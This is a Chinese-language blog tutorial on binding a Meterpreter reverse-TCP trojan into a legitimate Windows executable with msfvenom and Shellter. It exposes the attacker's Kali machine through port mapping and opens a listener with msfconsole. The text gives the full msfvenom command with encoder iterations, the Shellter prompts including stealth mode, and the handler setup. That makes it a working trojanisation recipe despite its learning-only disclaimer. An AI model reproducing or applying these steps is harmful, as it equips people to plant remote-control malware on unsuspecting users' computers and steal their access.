msfvenom & shellter——程序捆绑木马_端口映射远程控制

文章目录

  • 一、工具&环境
  • 二、准备
  • 三、木马与程序捆绑
    • Ⅰ、msfvenom捆绑
    • Ⅱ、shellter捆绑
  • 四、msfconsole监听

免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规

一、工具&环境

  1. VMware V15.5
  2. Kali-Linux-2020.2
  3. msfconsole
  4. msfvenom
  5. shellter
  6. 花生壳
  7. 远程计算器

二、准备

端口映射
使用花生壳将Kali的内网IP映射,端口号为默认4444
msfvenom & shellter——程序捆绑木马_端口映射远程控制_第1张图片
在CMD中Ping一下域名得到IP
接下来写入木马

三、木马与程序捆绑

Ⅰ、msfvenom捆绑

在终端输入以下指令以生成木马并捆绑到目标程序

msfvenom -p windows/meterpreter_reverse_tcp LHOST={公网IP} LPORT={公网端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5 -x {捆绑对象}.exe

Ⅱ、shellter捆绑

Choose Operation Mode - Auto/Manual (A/M/N): A
Perform Online Version Check? (Y/N/H): N
PE Traget: 程序绝对路径

...(程序运行中)

Enable Stralth Mode? (Y/N/H): Y
Use a listed payload or custom? (L/C/H): L
Select payload by index: 1 (选择meterpreter_reverse_tcp)
SET LHOST:(公网IP)
SET LPORT:(公网端口)
...

捆绑后源程序文件会备份到./shellter/Shellter_Backups下

四、msfconsole监听

打开Kali终端输入msfconsole
输入 use exploit/multi/handler
exploit即可展开监听
下图是远程访问示例
msfvenom & shellter——程序捆绑木马_端口映射远程控制_第2张图片

提高警惕,切勿安装不明来源的程序软件

欢迎在评论区留言
感谢浏览

你可能感兴趣的:(#,渗透测试)